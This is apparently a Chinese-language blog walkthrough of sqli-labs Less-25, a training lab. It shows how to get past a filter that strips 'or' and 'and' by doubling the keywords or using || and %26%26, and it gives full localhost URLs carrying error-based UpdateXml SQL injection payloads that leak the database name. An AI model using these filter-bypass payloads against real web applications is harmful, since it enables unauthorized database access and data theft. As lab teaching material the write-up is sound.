【sqli-labs】 less25 GET- Error based -All you OR&AND belong to us -string single quote(基于错误的去除了or和and的GET型单引号注入)

加单引号

order by一下

http://localhost/sqli-labs-master/Less-25/?id=1‘ order by 1%23

order by 变成了der by

下面的hint也显示了过滤后的字符串，其实直接看报错就可以看出来了，虽然标题是屏蔽了or和and，结果order也被误伤了

由于过滤只是单纯的将or and用空串进行了替换那么构造oorrder by就应该可以通过了

http://localhost/sqli-labs-master/Less-25/?id=1‘ oorrder by 1%23

union select完全没有过滤

and绕过

http://localhost/sqli-labs-master/Less-25/?id=1‘ anandd UpdateXml(1,concat(0x7e,database(),0x7e),1)%23

上面的绕过方式被称为双写绕过，除此之外，还可以用符号绕过

                符号          URL编码

or              ||              %7c%7c

and           &&           %26%26(GET提交必须编码)

http://localhost/sqli-labs-master/Less-25/?id=0‘ || UpdateXml(1,concat(0x7e,database(),0x7e),1)%23

http://localhost/sqli-labs-master/Less-25/?id=1‘ %26%26 UpdateXml(1,concat(0x7e,database(),0x7e),1)%23

【sqli-labs】 less25 GET- Error based -All you OR&AND belong to us -string single quote(基于错误的去除了or和and的GET型单引号注入)

标签：oca   int   替换   string   class   cal   通过   error   屏蔽